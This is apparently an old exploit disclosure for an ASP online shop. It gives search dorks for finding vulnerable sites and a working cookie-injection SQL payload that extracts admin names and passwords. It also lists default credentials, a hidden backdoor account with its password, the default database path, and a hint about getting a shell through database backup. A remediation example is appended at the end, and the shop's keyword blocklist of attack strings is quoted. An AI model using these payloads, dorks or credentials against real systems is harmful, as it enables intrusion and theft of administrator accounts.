############################################################################
#
# Title: ASP online shop cookie injection vulnerability
# Time: 2011-09-25
# Team: makebugs
# Author: 晴天小铸
############################################################################
PS: Please stop by and show some support~!
Keywords: inurl:sort.asp?sort_id= or inurl:pinpai.asp?pinpai_id=
Code:
' Preliminary check of form data: test for attack strings
Form_Badword="%20or%20|'|""|%|update|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe"
if request.form<>"" and uBits ="" then
    Chk_badword=split(Form_Badword,"|")
    FOR EACH name IN Request.Form
        for i=0 to ubound(Chk_badword)
            If Instr(LCase(request.form(name)),Chk_badword(i))<>0 Then
                showerr "e"
            End If
        NEXT
    NEXT
end if

' Preliminary check of query-string parameters: test for attack strings
Query_Badword="%20or%20|'|""|%|update|=|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe"
if request.QueryString<>"" then
    Chk_badword=split(Query_Badword,"|")
    FOR EACH Query_Name IN Request.QueryString
        for i=0 to ubound(Chk_badword)
            If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(i))<>0 Then
                showerr "e"
            End If
        NEXT
    NEXT
End if
http://www.2cto.com/sort.asp?sort_id=1
// Cookies are not checked, you know what that means
Exp: javascript:alert(document.cookie="sort_id="+escape("1 and 1=2 union select 1,admin_name,admin_pass,4,5,6,7 from ad_admin"))
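The admin backend can back up the database, you know what that means~!!!!! It has to be invoked with NC; if you don't understand, see http://www.2cto.com/Article/201106/92845.html
Default admin account and password: admin admin888
There is also a hidden account: swit xuxinyao999. A backdoor?
Default database path: Database/shopdata.mdb
Fix: an old problem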
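
One way to close the gap described above, as an added example that is not code from the original post or from the shop application: read sort_id from a named collection, accept only digits, and bind it as a typed ADO parameter. It assumes sort.asp currently reads the value with the generic Request("sort_id") lookup (the page does not show that code); the "products" table and its columns are hypothetical names.

```vbscript
' Added example for sort.asp (goes inside <% ... %>); not the application's code.
' Assumption: the "products" table and its "id"/"title" columns are hypothetical.
Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

' Accept only a short all-digit string and return it as a Long; -1 means invalid.
Function ParseId(raw)
    Dim re
    ParseId = -1
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    If re.Test(raw) Then ParseId = CLng(raw)
End Function

Dim sortId, conn, cmd, rs

' Name the collection explicitly. Request("sort_id") searches QueryString, Form,
' Cookies, ClientCertificate and ServerVariables in that order, so a cookie
' supplies the value whenever the URL and the form do not, and the two
' bad-word filters never look at it.
sortId = ParseId(CStr(Request.QueryString("sort_id")))
If sortId < 0 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & _
          Server.MapPath("Database/shopdata.mdb")

' Bind the value as a typed parameter instead of concatenating it into the SQL.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT id, title FROM products WHERE sort_id = ?"
cmd.Parameters.Append cmd.CreateParameter("sort_id", adInteger, adParamInput, , sortId)

Set rs = cmd.Execute
Do While Not rs.EOF
    Response.Write Server.HTMLEncode(rs("title") & "") & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
```

The same change applies to pinpai.asp and its pinpai_id parameter; the default credentials, the hidden account and the default database path listed above need to be changed separately.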